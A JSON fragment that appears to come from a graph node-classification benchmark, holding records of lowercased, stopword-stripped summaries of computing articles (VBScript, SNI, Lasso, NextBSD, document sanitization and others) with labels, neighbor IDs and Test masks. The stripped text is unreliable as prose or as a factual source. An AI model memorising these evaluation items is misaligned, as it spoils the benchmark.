    "text": "VBScript:vbscript vbscript microsoft visual basic scripting edition active scripting language developed microsoft modeled visual basic allows microsoft windows system administrators generate powerful tools managing computers error handling subroutines advanced programming constructs give user complete control many aspects computing environment vbscript uses component object model access elements environment within running example filesystemobject fso used create read update delete files vbscript installed default every desktop release microsoft windows since windows 98 windows server since windows nt 4.0 option pack optionally windows ce depending device installed vbscript script must executed within host environment several provided microsoft windows including windows script host wsh internet explorer ie internet information services iis additionally vbscript hosting environment embeddable programs technologies microsoft script control vbscript began part microsoft windows script technologies launched 1996 technology also included jscript initially targeted web developers period two years vbscript advanced version 1.0 2.0 time gained support windows system administrators seeking automation tool powerful batch language first developed early 1980s march 6 1988 alan cooper showed bill gates shell prototype allowed widgets added dynamically march 20 1991 microsoft adopted quick basic allowed users create windows apps quickly easily gui finally august 1 1996 internet explorer made features included vbscript version 5.0 functionality vbscript increased new features including regular expressions classes statement eval execute executeglobal functions evaluate execute script commands built execution another script function-pointer system via getref distributed com dcom support version 5.5 submatches added regular expression class vbscript finally allow script authors capture text within expression groups capability already available jscript advent .net framework scripting team took decision implement future support vbscript within asp.net web development therefore new versions vbscript engine would developed would henceforth supported microsoft sustaining engineering team responsible bug fixes security enhancements windows system administrators microsoft suggests migrating windows powershell however scripting engine continue shipped future releases microsoft windows iis employed client-side web development microsoft internet explorer vbscript similar function javascript used write executable functions embedded included html pages interact document object model dom page perform tasks possible html alone however web browsers firefox opera built-in support vbscript means client-side scripting cross-browser compatibility required developers usually choose javascript vbscript vbscript also used server-side processing web pages notably microsoft active server pages asp asp engine type library invokes run vbscript scripts vbscript embedded asp page contained within context switches following example asp page vbscript displays current time 24-hour format also used default script error messages windows operating systems vbscript also used create applications run directly workstation running microsoft windows simplest example script makes use windows script host wsh environment script usually stand-alone file file extension codice_1 script invoked two ways used display output receive input gui dialog input boxes used command line environment vbscript included two types scripting files windows script files html applications windows script file wsf styled xml wsf file include multiple vbs files result wsf files provide means code reuse library classes functions stored one codice_1 files included codice_3 files functionality reused modular way files extension codice_3 executed using codice_1 file html application hta styled html html file used generate user interface scripting language vbscript used program logic files extension codice_6 executed using vbscript jscript also used windows script component activex-enabled script class invoked com-enabled applications files extension vbscript simple create coded using easy use text editor like notepad simple vbscript saved codice_1 extension run windows system double clicking language vbscript modeled visual basic therefore reviewed using similar categories procedures control structures constants variables user interaction array handling date/time functions error handling mathematical functions objects regular expressions string manipulation following key points introduction vbscript language microsoft procedure main construct vbscript separating code smaller modules vbscript distinguishes function return result assignment statement subroutine parameters positional passed value reference control structures include usual iterative conditional loops if-then-else statements case statements complex variants elseif nested control structures memory aid coding certainly readability large number constants true false logical values vbokcancel vbyesno msgbox codes vbblack vbyellow color values vbcr carriage return character many others variables variant type default possible sometimes necessary force particular type integer date etc using conversion functions cint cdate etc user interaction provided functions codice_8 codice_9 provide simple dialogue box format messages input functions display prompting messages former returning standard response latter returning one user-supplied text numeric value elaborate gui interaction controls vbscript used combination html example html application event-driven forms supported visual basic visual basic applications names case-sensitive however considered best practice vbscript style consistent capitalize judiciously hosted windows script host vbscript provides numerous features common scripting languages available visual basic 6.0 features include direct easy access cscript command line runner provides options file system management file modification streaming text operations implemented scripting runtime library codice_10 provides objects filesystemobject file textstream expose windows file system programmer binary file memory i/o provided adodb.stream class also used string builders avoid excessive string concatenation costly interconvert byte arrays strings database access made possible activex data objects ado iis metabase manipulated using getobject function sufficient permissions useful creating destroying sites virtual directories xml files schemas manipulated microsoft xml library application programming interfaces also used retrieve content world wide web via xmlhttp serverxmlhttp objects class strings msxml2.xmlhttp.6.0 msxml2.serverxmlhttp.6.0 respectively functionality also added activex technologies security concerns led many activex controls blacklisted internet explorer process microsoft deploys killbit via monthly windows security updates disable vulnerable microsoft third party code programmers utilize extensibility via com activex modules specifically equip script host vbscript required desired functions vtool component instance adds number dialog windows binary file access functionality microsoft routinely make available ide integrated development environment vbscript although microsoft script editor bundled certain versions microsoft office debugging purposes microsoft script debugger still used current windows versions even though tool updated years allows user set break points vbscript code user interface clumsy vbscript debuggers available third-party sources many text editors offer syntax highlighting language execution error occurs script host issues message stating type error number offending line although vbscript general-purpose scripting language several particular areas use noteworthy first widely used among system administrators microsoft environment situation may change promotion increased use windows powershell second vbscript scripting language quick test professional test automation tool third area note adoption vbscript internal scripting language embedded applications industrial operator interfaces human machine interfaces hierarchical dbms intersystems caché roots language mumps also supports implementation vbscript cache basic programming stored code vbscript omits several useful features full visual basic strong typing extended error trapping ability pass variable number parameters subroutine however use relatively widespread easy learn implement code language need pay royalties microsoft long vbscript trade mark acknowledged organization licenses visual basic applications vba microsoft companies autodesk statsoft great plains accounting visio subsequently acquired microsoft done allowed redistribute full vba code-writing debugging environment product vbscript used place vba macro language outlook 97 vbscript effectively used automating day day office tasks well monitoring windows-based environment first choice tool server administrators ms office users tech contributors also used collaboration adodb activex data objects adodb effective database connectivity",
    "neighbors": [
      9216,
      10243,
      11270,
      5643,
      7691,
      4624,
      9234,
      1043,
      22,
      537,
      6171,
      540,
      3102,
      1055,
      7713,
      9762,
      2083,
      8227,
      8740,
      4136,
      1577,
      10281,
      10282,
      4143,
      9263,
      9780,
      2101,
      6709,
      1591,
      8246,
      10808,
      10812,
      3648,
      4160,
      4674,
      8262,
      10310,
      1098,
      4170,
      7754,
      4173,
      4174,
      10828,
      9808,
      4178,
      83,
      9813,
      10839,
      8281,
      603,
      92,
      9819,
      608,
      1632,
      3170,
      8291,
      5733,
      4198,
      7274,
      622,
      9839,
      9328,
      4210,
      5747,
      7796,
      1656,
      6265,
      5754,
      4731,
      6778,
      7290,
      9340,
      10879,
      5761,
      9348,
      5765,
      3718,
      2183,
      10886,
      6281,
      8841,
      5259,
      653,
      6797,
      2193,
      9874,
      10387,
      10900,
      11412,
      10902,
      11414,
      3224,
      3736,
      4248,
      5119,
      6809,
      9881,
      7838,
      3233,
      6305,
      3235,
      4771,
      6820,
      7846,
      1703,
      5287,
      9377,
      2221,
      10414,
      7343,
      3250,
      9907,
      5300,
      7351,
      7355,
      10428,
      2749,
      7870,
      2244,
      8391,
      200,
      712,
      9420,
      214,
      2777,
      9434,
      2782,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      3303,
      1770,
      8939,
      3308,
      3821,
      8429,
      10991,
      11498,
      10993,
      759,
      3834,
      6910,
      1791,
      8959,
      11519,
      263,
      1805,
      9997,
      6927,
      3856,
      11537,
      786,
      5395,
      790,
      3351,
      11030,
      5401,
      5913,
      8473,
      8985,
      797,
      8988,
      11546,
      4384,
      9505,
      5413,
      2854,
      5925,
      5928,
      3881,
      10024,
      10026,
      11559,
      1837,
      8494,
      303,
      7983,
      10029,
      11570,
      1844,
      9525,
      11060,
      9527,
      10039,
      11572,
      315,
      6972,
      7486,
      5952,
      321,
      3394,
      1348,
      844,
      847,
      3922,
      1366,
      1879,
      4439,
      5465,
      10079,
      11616,
      2401,
      2402,
      2915,
      2919,
      11625,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      3462,
      8582,
      8584,
      9609,
      1418,
      5003,
      5004,
      6028,
      8080,
      7064,
      3481,
      11677,
      10654,
      8607,
      929,
      7076,
      8101,
      4010,
      5546,
      10666,
      10157,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      4542,
      960,
      963,
      8132,
      6088,
      969,
      7629,
      974,
      3535,
      8659,
      5078,
      11223,
      1498,
      5594,
      11229,
      478,
      8161,
      6114,
      6115,
      9188,
      11243,
      9196,
      2541,
      4590,
      6637,
      9709,
      6641,
      11247,
      3573,
      9205,
      10229,
      2556,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 11684,
    "label": 4,
    "text": "Trusted_timestamping:trusted timestamping trusted timestamping process securely keeping track creation modification time document security means one—not even owner document—should able change recorded provided timestamper integrity never compromised administrative aspect involves setting publicly available trusted timestamp management infrastructure collect process renew timestamps idea timestamping information centuries old example robert hooke discovered hooke law 1660 want publish yet wanted able claim priority published anagram ceiiinosssttuv later published translation ut tensio sic vis latin extension force similarly galileo first published discovery phases venus anagram form sir isaac newton responding questions leibniz letter 1677 concealed details fluxional technique anagram many timestamping schemes different security goals coverage standards systematic classification evaluation timestamping schemes see works masashi une according nowiki rfc 3161 /nowiki standard trusted timestamp timestamp issued trusted third party ttp acting time stamping authority tsa used prove existence certain data certain point e.g contracts research data medical records ... without possibility owner backdate timestamps multiple tsas used increase reliability reduce vulnerability newer ansi asc x9.95 standard trusted timestamps augments nowiki rfc 3161 /nowiki standard data-level security requirements ensure data integrity reliable time source provable third party standard applied authenticating digitally signed data regulatory compliance financial transactions legal evidence technique based digital signatures hash functions first hash calculated data hash sort digital fingerprint original data string bits practically impossible duplicate set data original data changed result completely different hash hash sent tsa tsa concatenates timestamp hash calculates hash concatenation hash turn digitally signed private key tsa signed hash timestamp sent back requester timestamp stores original data see diagram since original data calculated hash hash function one way function tsa never gets see original data allows use method confidential data anyone trusting timestamper verify document created date timestamper vouches also longer repudiated requester timestamp possession original data time given timestamp prove see diagram hash original data calculated timestamp given tsa appended hash result concatenation calculated call hash digital signature tsa needs validated done checking signed hash provided tsa indeed signed private key digital signature verification hash compared hash b inside signed tsa message confirm equal proving timestamp message unaltered issued tsa either timestamp altered timestamp issued tsa advent cryptocurrencies like bitcoin become possible securely timestamp information decentralized tamper-proof manner digital data hashed hash incorporated transaction stored blockchain serves secure proof exact time data existed proof due tremendous amount computational effort performed hash submitted blockchain tampering timestamp would require computational resources rest network combined done unnoticed decentralized timestamping approach using blockchain also found applications areas dashboard cameras secure integrity video files time recording prove priority creative content ideas shared social media platforms",
    "neighbors": [
      9248,
      8674,
      5566,
      744,
      3982,
      10831,
      3377,
      2558,
      1087
    ],
    "mask": "None"
  },
  {
    "node_id": 11685,
    "label": 4,
    "text": "Anti-spam_appliances:anti-spam appliances anti-spam appliances software hardware devices integrated on-board software implement spam filtering and/or anti-spam instant messaging also called spim deployed gateway front mail server normally driven operating system optimized spam filtering generally used larger networks companies corporations isps universities etc reasons hardware anti-spam appliances might selected instead software could include",
    "neighbors": [
      7066,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 11686,
    "label": 5,
    "text": "Polar_modulation:polar modulation polar modulation analogous quadrature modulation way polar coordinates analogous cartesian coordinates quadrature modulation makes use cartesian coordinates x considering quadrature modulation x axis called in-phase axis axis called q quadrature axis polar modulation makes use polar coordinates r amplitude θ phase quadrature modulator approach digital radio transmission requires linear rf power amplifier creates design conflict improving power efficiency maintaining amplifier linearity compromising linearity causes degraded signal quality usually adjacent channel degradation fundamental factor limiting network performance capacity additional problems linear rf power amplifiers including device parametric restrictions temperature instability power control accuracy wideband noise production yields also common hand compromising power efficiency increases power consumption reduces battery life handheld devices generates heat issue linearity power amplifier theoretically mitigated requiring input signal power amplifier constant envelope i.e contain amplitude variations polar modulation system power amplifier input signal may vary phase amplitude modulation accomplished directly controlling gain power amplifier changing modulating supply voltage thus polar modulation system allows use highly non-linear power amplifier architectures class e class f. order create polar signal phase transfer amplifier must known least 17 db amplitude range phase transitions one another amplitude perturbation calculated transition n number samples q sufficiently large allow accurate tracing signal one hundred samples per symbol would lowest number workable amplitude change signal known phase error introduced amplifier amplitude change used pre-distort signal one simply subtracts phase error amplitude modulating q signals polar modulation originally developed thomas edison 1874 quadruplex telegraph – allowed 4 signals sent along pair lines 2 direction sending signal direction already accomplished earlier edison found combining amplitude phase modulation i.e. polar modulation could double 4 signals – hence quadruplex",
    "neighbors": [
      3040,
      1121,
      5664,
      7490,
      3140,
      7108,
      8160,
      2920,
      7400,
      10381,
      1550,
      2994,
      2968,
      5020,
      5304
    ],
    "mask": "Test"
  },
  {
    "node_id": 11687,
    "label": 7,
    "text": "Coresystems:coresystems coresystems ag software developing company headquartered switzerland provider field service management solutions technicians coresystems founded 2006 windisch aargau november 2013 company raised 15.5 million first round funding consortium private investors including german tech investor peter zencke former sap executive board member head research development coresystems recently begun exploring products internet things iot appointing iot expert professor elgar fleisch board fleisch holds double appointment eth zürich university st. gallen hsg advises siemens bosch developing iot products june 5 2018 sap announced acquisition coresystems 2013 manuel grenacher founder coresystems awarded 2013 swiss ict award outstanding personality swiss computer science 2014 company nominated 2014 export award category success according 2016 published market research report field service management market global forecast 2020 published marketsandmarkets coresystems identified key innovator market",
    "neighbors": [
      4194,
      467,
      5210
    ],
    "mask": "Test"
  },
  {
    "node_id": 11688,
    "label": 9,
    "text": "Lasso_(programming_language):lasso programming language lasso application server server management interface used develop internet applications general-purpose high-level programming language originally web datasource connection tool filemaker later included apple computer filemaker 4.0 claris homepage cdml since evolved complex language used develop serve large-scale internet applications web pages lasso includes simple template system allowing code control generation html content types lasso object-oriented every value object also supports procedural programming unbound methods language uses traits multiple dispatch extensively lasso dynamic type system objects loaded augmented runtime automatic memory management comprehensive standard library three compiling methodologies dynamic comparable php-python just-in-time compilation comparable java .net framework pre-compiled comparable c lasso also supports query expressions allowing elements within arrays types sequences iterated filtered manipulated using natural language syntax similar sql lasso includes full unicode character support standard string object allowing serve support multi-byte characters japanese swedish supports transparent utf-8 conversion writing string data network file system lasso often used scripting language also used wide range non-scripting contexts lasso code packaged standalone executable programs called lassoapps folder structures compiled single files lasso server application server runs system service receives requests web server fastcgi hands request appropriate lasso instance formulates response multiple individual instances supported allowing one server handle multiple sites separate processes server uses high performance io-based green threading system designed multi-core systems lasso compared server-side scripting languages php python coldfusion ruby etc free development lasso allows partial access source code allowing developers add change major components language example ke carlton ds implementation lasso inline licensing comes sas stand-alone versions lasso began mid-1990s early web developers attempting connect apple filemaker pro database world wide web mac platform two solutions eric bickford web-fm russell owens filemaker cgi rofm built applescript requiring use filemaker pro calculation fields formatting web-fm subsequently rewritten c fall 1995 developer vince bonafonti wrote new cgi based rofm using c/c++ improved performance using notion html-based templates instead relying calculation fields proved popular filemaker community brought attention bill doerrfeld owner blue world communications inc. print website development firm based issaquah washington bought source code time blue world experimented improvements cgi frontier scripting environment inspired name lasso need improvement drove creation c-based cgi later released lasso 1.0 point lasso worked filemaker pro 3.x webstar ran apple mac os 8 lasso popularity grew notably reviews print publications blue world hosting participation many email discussion lists many specifically pertained filemaker pro blue world also made frequent appearances known leading company macworld conferences following release lasso 1.2 lineup january 1997 blue world bonfantis entered private talks claris software division apple computer owner filemaker pro claris eventually licensed post-version-1.2 lasso source code help vince paul bonfanti released filemaker web companion component filemaker pro 4.0 filemaker web companion language cdml claris dynamic markup language differed lasso 1.2 ldml lasso dynamic markup language close enough offer easy transition developers looking serve filemaker pro third-party servers offered compelling features including lasso-like web companion filemaker 4.0 helped grow popularity lasso fast-growing macintosh web development community blue world continued developing lasso kyle jessup becoming lasso lead programmer lasso 2.0 released july 1997 introducing fundamental shifts lasso could used february 26 2002 blue world released lasso 5 radical departure filemaker-centric language date never lasso 4 release version number skipped 3 5 lasso 5 included among many updates completely rewritten architecture os x windows linux embedded mysql database though lasso 5 still spoke filemaker database filemaker server filemaker data source remained relatively slow compared sql engine prohibitively expensive since v2.0 lasso fully multithreaded allowing many connections succumbed filemaker latency lag certain operations way get around reliably make major changes data source lasso 5 also added support apache http server natively os x windows linux joining webstar 5 appleshare ip replaced os x server itools tenon mac os 9 lasso used many years unsupported drove closer ties classic lamp server architecture blue world communications released series plug-ins popular web development packages macromedia adobe lasso studio 1.5 dreamweaver runner macworld magazine editors choice awards internet development 2001 losing adobe dreamweaver 3 lasso studio dreamweaver 1.5 also reviewed favorably macworld magazine earning 4 half mice later version lasso studio supported macromedia dreamweaver adobe golive including lasso studio 7 dreamweaver golive march 26 2004 release filemaker server filemaker server advanced version 7 2004 filemaker signaled major change strategy serving data web sites emphasized xml-xslt odbc jdbc connectivity expensive filemaker server advanced product blue world began distance lasso language filemaker apple 2005 lasso pro received mysql network certification demonstrating importance popular open source database future lasso august 1 2004 bill doerrfeld officially sold lasso product line omnipilot software inc. ft. lauderdale florida lasso 7.0.3 last version lasso released blue world october 25 2004 omnipilot officially announced release lasso 8 version including sandboxing multiple sites server connectivity many new datasources also included first free version lasso limited ip addresses omnipilot followed release number complementary products including lasso studio 8 dreamweaver golive march 28 2005 lasso studio eclipse chartfx integration number free lasso-based solutions 2007 three omnipilot employees kyle jessup original developer lasso 1.0 fletcher sandbeck early employee blue world known regular tips tricks kerry adams employee omnipilot created new company lassosoft llc purchase intellectual property lasso omnipilot continue development recognizing need competitive much popular languages php asp radical changes architecture syntax structure made released lasso 9.0 technical challenges caused changes coupled limited marketing resources led significant community decline company struggled release documentation support new language december 2010 new canadian company formed lassosoft inc. bought invested heavily lasso 9.0 language marketing documentation kyle jessup agreed stay lasso lead developer benevolent dictator life several releases 9.1 9.2 released developments recent years three ways say hello world lasso page square brackets reserved lasso html entities must used show square brackets lasso pages purposes marking lasso tags alternatively printing square brackets lasso disabled including no_square_brackets file top inlines basic lasso tool database actions database commands issued lasso db-independent metalanguage case search code works mysql filemaker pro database backend lasso connect needed sql statement course embedded inline using database server supports sql example dashes commands denote optional parameters specified order generated dynamically last duplicate parameters take precedence inline command supports large range parameters allowing developers interact databases may intimate knowledge custom database connectors created allows leveraging abstracted nature inline command next procedural example prints lyrics song 99 bottles beer next example uses oop approach print lyrics object represented string",
    "neighbors": [
      9345,
      11011,
      9224,
      10506,
      6797,
      9875,
      1556,
      4507,
      670,
      1952,
      8609,
      9385,
      5677,
      10413,
      7983,
      4529,
      10675,
      5684,
      2485,
      9780,
      823,
      8644,
      865,
      9701,
      11625,
      8554,
      3051,
      5612,
      7022,
      9330,
      3573,
      2808,
      3705,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 11689,
    "label": 2,
    "text": "NextBSD:nextbsd nextbsd operating system initially based trunk version freebsd august 2015 fork freebsd implements new features developed branches yet implemented freebsd 2019 website seems defunct later commits github date july 2016 basic features launchd notifyd asld libdispatch work installed cloning nextbsd repository github building generic machtest kernels installing new world existing 10.x current system following instructions readme launchd start initial jobs part repo project refers installer first planned milestone website future plans include convert rc tying notifyd potential consumers nextbsd announced jordan hubbard kip macy august 2015 bay area freebsd users group bafug nextbsd based freebsd-current kernel adding mach ipc libdispatch notifyd asld launchd components derived darwin apple open-source code macos units resource ownership task consists virtual address space port right namespace one threads implemented extension process units cpu execution within task simple extension kthreads conjunction memory managers mach implements notion sparse virtual address space shared memory modifications internal units memory management memory objects include named entries regions representations potentially persistent data may mapped address spaces unsupported secure simplex communication channels accessible via send receive capabilities known port rights message queues remote procedure calls notifications semaphores lock sets mach semaphores lock sets supported clocks timers waiting rudimentary shims current bsd operating system variants support many common ieee ansi iso posix standards retaining traditional bsd behavior like unix bsd kernel monolithic meaning device drivers kernel run privileged mode part core operating system selection significant unix versions unix-like operating systems descend bsd includes",
    "neighbors": [
      7552,
      7561,
      5771,
      7307,
      5397,
      8725,
      10016,
      3237,
      8877,
      7983,
      1718,
      7483,
      9153,
      8262,
      8395,
      11221,
      9320,
      9452,
      5363,
      5492,
      2045,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 11690,
    "label": 3,
    "text": "WEC_Le_Mans:wec le mans wec le mans racing simulation arcade game released 1986 konami first racing video game depict 24 hours le mans lap le mans split three sections time day changes day dusk dusk night night dawn game attempted realistically simulate car driving car jumping turning back forth spinning 180 degrees emphasis acceleration braking gear shifting along need counter-steering avoid spin-outs also featured accurately simulated courses approved automobile club de l'ouest used force feedback simulate road vibration form vibrating steering wheel reacts driver acceleration off-road bumps game known difficult complete tracks width remains constant 3 lanes racing slight contact opposing race car result either spin spectacular flip air going course running wide corner also end spin konami released three different video game arcade cabinet versions video arcade game upright machine 'mini spin driver sat sit-down cockpit 'big spin version deluxe arcade version would actually spin gamer around 360° spinning base turning left right depending corner front 'big spin arcade machine looked like real prototype c race car arcade cabinet expensive time high price £7000 1986 equivalent £ game several ports imagine software imagine studios amstrad cpc commodore 64 msx zx spectrum rumored 16-bit port amiga atari st mentioned never came fruition original arcade game played home systems via mame though arcade cabinet simulated arcade version critically acclaimed upon release following debut preview '87 show september 1986 computer video games gave positive review january 1987 issue clare edgeley declaring favourite game show describing fast realistic racing simulation praising rotating cockpit cabinet concluding game played months gave edge run mainly better movement noted many seem prefer run atei amusement trades exhibition international show january 1987 run wec le mans stole january show according computer video games clare edgeley reviewed february 1987 issue sinclair user stating far way sophisticated certainly thrilling game 've ever played describing like hang-on racing car actually sit inside movement system entirely different anything experienced really get thrown around simulates action even spinning shakes whole car going track skidding marked border lines stated hazards avoid cars bombing past great graphics high speed also commercially successful arcades coinslot dedicated arcade game chart number-three behind street fighter continental circus spectrum version game also earned critical acclaim spectrum version also commercially successful reaching 4th place uk spectrum chart may 1989 konami tanaka fumihaki cited wec le mans chief inspiration konami 1995 game speed king spanish magazine microhobby valued game following scores originality 30 graphics 70 motion 80 sound 50 difficulty 80 addiction 80",
    "neighbors": [
      7269,
      4716,
      8300,
      9006,
      1776,
      3348,
      6390
    ],
    "mask": "Test"
  },
  {
    "node_id": 11691,
    "label": 4,
    "text": "Backup_Express:backup express catalogic dpx formerly bex backup express enterprise-level data protection solution backs restores data applications variety operating systems data protection disaster recovery business continuity planning capabilities catalogic dpx protects physical virtual servers including vmware supports many database applications including oracle sql sharepoint exchange dpx supports agent-based agent less backups users map use backed version database something goes wrong primary version dpx managed single console catalog allows centralized control tape-based disk-based data protection jobs across heterogeneous operating systems dpx protect data centers remote sites supports recovery dr. dpx protect data disk tape cloud used various recovery use cases including file application bmr vm dr. dpx spin vms backup images recover physical servers bring applications online snapshot based backups used recover ransomware according dpx interface guide dpx contains interfaces following software database management systems db2 lotus notes microsoft exchange novell groupwise micro focus open enterprise services oes oracle sap sharepoint sql-backtrack sql server sybase oracle dpx provides cloning capabilities microsoft exchange sql server oracle dpx provides read/write access recovery points sql log truncation rollback time point time recovery sql granular recovery exchange sharepoint sql available dpx uses tape tape library jukebox virtual tape library vtl disk local compellent netapp dell emc hp data domain disk-to-disk-to-tape cloud backup target dpx back disk vstor netapp fas storage dpx infrastructure 3 types components following among capabilities dpx october 2013 syncsort sold data protection business investor group led bedford venture partners windcrest partners spun data protection business called catalogic software company produces catalogic dpx june 4 2018 reported catalogic software taken equity stake european data protection company storware",
    "neighbors": [
      3366,
      1358,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11692,
    "label": 7,
    "text": "Oracle_Cloud_Platform:oracle cloud platform oracle cloud platform ocp platform service paas offered oracle corporation part oracle cloud platform used build deploy integrate extend applications cloud platform supports variety programming languages databases tools frameworks including oracle-specific open source third-party software systems oracle cloud platform offerings include data management application development integration content experience business analytics systems management security oracle cloud platform currently 12 regions oracle cloud platform offers public private hybrid cloud deployment models oracle cloud platform provides infrastructure service iaas platform service paas infrastructure offered global network oracle managed data centers oracle deploys cloud regions inside region least three fault-independent availability domains availability domains contains independent data center power thermal network isolation oracle cloud generally available north america emea apac japan announced south america us govt regions coming soon",
    "neighbors": [
      6208,
      4194,
      10340,
      8262,
      4236,
      4429,
      1935,
      7248,
      7537,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 11693,
    "label": 5,
    "text": "Server_Name_Indication:server name indication server name indication sni extension transport layer security tls computer networking protocol client indicates hostname attempting connect start handshaking process allows server present multiple certificates ip address tcp port number hence allows multiple secure https websites service tls served ip address without requiring sites use certificate conceptual equivalent http/1.1 name-based virtual hosting https desired hostname encrypted original sni extension eavesdropper see site requested making tls connection client requests digital certificate web server server sends certificate client examines compares name trying connect name included certificate match occurs connection proceeds normal match found user may warned discrepancy connection may abort mismatch may indicate attempted man-in-the-middle attack however applications allow user bypass warning proceed connection user taking responsibility trusting certificate extension connection however may difficult — even impossible due lack full list names advance — obtain single certificate covers names server responsible server responsible multiple hostnames likely need present different certificate name small group names since 2005 cacert run experiments different methods using tls virtual servers experiments unsatisfactory impractical example possible use subjectaltname contain multiple domains controlled one person single certificate unified communications certificates must reissued every time list domains changes name-based virtual hosting allows multiple dns hostnames hosted single server usually web server ip address achieve server uses hostname presented client part protocol http name presented host header however using https tls handshake happens server sees http headers therefore possible server use information http host header decide certificate present names covered certificate served ip address practice means https server serve one domain small group domains per ip address secured efficient browsing assigning separate ip address site increases cost hosting since requests ip addresses must justified regional internet registry ipv4 addresses exhausted result many websites effectively constrained using secure communications ipv4 ipv6 address space exhausted websites served using ipv6 unaffected issue sni addresses issue client send name virtual domain part tls negotiation enables server select correct virtual domain early present browser certificate containing correct name therefore clients servers implement sni server single ip address serve group domain names impractical get common certificate sni added ietf internet rfcs june 2003 rfc 3546 transport layer security tls extensions latest version standard rfc 6066 desired hostname encrypted eavesdropper see site requested helps security companies provide filtering feature governments implement censorship domain fronting used workaround google aws taken action disallow therefore becoming less alternative mid 2018 upgrade called encrypted sni esni rolled experimental phase address risk domain eavesdropping march 1 2019 daniel stenberg stated mozilla firefox supports esni 2004 patch adding tls/sni openssl created edelkey project 2006 patch ported development branch openssl 2007 back-ported openssl 0.9.8 first released 0.9.8f application program implement sni tls library uses must implement application must pass hostname tls library complicating matters tls library may either included application program component underlying operating system browsers implement sni running operating system others implement running certain operating systems",
    "neighbors": [
      4224,
      513,
      5892,
      517,
      1157,
      8582,
      1288,
      4490,
      9744,
      1683,
      1688,
      1435,
      9117,
      3742,
      9245,
      3744,
      5666,
      2083,
      3237,
      8358,
      9125,
      9647,
      10033,
      9394,
      11569,
      5048,
      7736,
      9144,
      1215,
      9281,
      10622,
      8644,
      9412,
      3657,
      1098,
      5834,
      11469,
      10831,
      11345,
      1363,
      2003,
      5078,
      4439,
      5590,
      3545,
      474,
      3707,
      3805,
      5470,
      7264,
      737,
      865,
      7139,
      8674,
      10341,
      4326,
      8554,
      7152,
      5107,
      501,
      1526,
      2169,
      3323,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 11694,
    "label": 9,
    "text": "Printer_Job_Language:printer job language printer job language pjl method developed hewlett-packard switching printer languages job level status readback printer host computer pjl adds job level controls printer language switching job separation environment status readback device attendance file system commands pjl conceived extension printer command language pcl supported postscript printers many printer vendors extended pjl include commands proprietary products pjl commands documented hp implemented hp vendor products pjl resides printer languages parses commands first syntax mainly uses plain english words",
    "neighbors": [
      11074,
      5384,
      6830,
      8628,
      8763
    ],
    "mask": "Test"
  },
  {
    "node_id": 11695,
    "label": 4,
    "text": "Sanitization_(classified_information):sanitization classified information sanitization process removing sensitive information document message sometimes encrypting document may distributed broader audience intent secrecy protection dealing classified information sanitization attempts reduce document classification level possibly yielding unclassified document intent privacy protection often called data anonymization originally term sanitization applied printed documents since extended apply computer media problem data remanence well redaction sanitization sense distinguished editing sense blacking deletion text document result effort intended allow selective disclosure information document keeping parts document secret typically result document suitable publication dissemination others intended audience original document example document subpoenaed court case information specifically relevant case hand often redacted context government documents redaction also called sanitization generally refers specifically process removing sensitive classified information document prior publication declassification traditional technique redacting confidential material paper document public release involves overwriting portions text wide black pen followed photocopying result—the obscured text may recoverable original alternatively opaque cover tape redaction tape opaque removable adhesive tape various widths may applied photocopying simple process minor security risks example black pen tape wide enough careful examination resulting photocopy may still reveal partial information text difference short tall letters exact length removed text also remains recognizable may help guessing plausible wordings shorter redacted sections computer-generated proportional fonts used even information leak redacted section form exact position nearby visible characters uk national archives published document redaction toolkit guidelines editing exempt information documents prior release provide guidance editing exempt material information held public bodies secure redacting far complicated problem computer files word processing formats may save revision history edited text still contains redacted text file formats unused portions memory saved may still contain fragments previous versions text text redacted portable document format pdf word processor formats overlaying graphical elements usually black rectangles text original text remains file uncovered simply deleting overlaying graphics effective redaction electronic documents requires removal relevant text image data document file either requires detailed understanding internal operation document processing software file formats used computer users lack software tools designed sanitizing electronic documents see external links redaction usually requires marking redacted area reason content restricted us government documents released freedom information act marked exemption codes denote reason content withheld us national security agency nsa published guidance document provides instructions redacting pdf files printed documents contain classified sensitive information frequently contain great deal information less sensitive may need release less sensitive portions uncleared personnel printed document consequently sanitized obscure remove sensitive information maps also redacted reason highly sensitive areas covered slip white paper cases sanitizing classified document removes enough information reduce classification higher level lower one example raw intelligence reports may contain highly classified information identities spies removed reports distributed outside intelligence agency initial report may classified top secret sanitized report may classified secret cases like nsa report uss liberty incident right report may sanitized remove sensitive data report may released general public seen uss liberty report paper documents generally sanitized covering classified sensitive portions photocopying document resulting sanitized document suitable distribution computer electronic digital documents difficult sanitize many cases information information system modified erased data remains storage may accident design underlying storage mechanism disk ram etc still allows information read despite nominal erasure general term problem data remanence contexts notably us nsa dod related organizations sanitization typically refers countering data remanence problem redaction used sense article however retention may deliberate feature form undo buffer revision history trash backups like example word processing programs like microsoft word sometimes used edit sensitive information unfortunately products always show user information stored file possible file may still contain sensitive information cases inexperienced users use ineffective methods fail sanitize document metadata removal tools designed effectively sanitize documents removing potentially sensitive information may 2005 us military published report death nicola calipari italian secret agent us military checkpoint iraq published version report pdf format incorrectly redacted using commercial software tools shortly thereafter readers discovered blocked-out portions could retrieved copying pasting word processor similarly may 24 2006 lawyers communications service provider filed legal brief regarding cooperation domestic wiretapping nsa text pages 12 14 pdf document incorrectly redacted covered text could retrieved using cut paste end 2005 nsa released report giving recommendations safely sanitize microsoft word document issues make difficult reliably implement multilevel security systems computer users differing security clearances may share documents challenge multilevel security gives example sanitization failure caused unexpected behavior microsoft word change tracking feature two common mistakes incorrectly redacting document adding image layer sensitive text without removing underlying text setting background color match text color cases redacted material still exists document underneath visible appearance subject searching even simple copy paste extraction proper redaction tools procedures must used permanently remove sensitive information often accomplished multi-user workflow one group people mark sections document proposals redacted another group verifies redaction proposals correct final group operates redaction tool permanently remove proposed items",
    "neighbors": [
      2432,
      3972,
      1801,
      11659,
      1169,
      9233,
      1692,
      1317,
      3366,
      8997,
      3629,
      1070,
      10417,
      7090,
      10034,
      10170,
      5186,
      1475,
      7369,
      7887,
      10195,
      2779,
      6494,
      2275,
      7781,
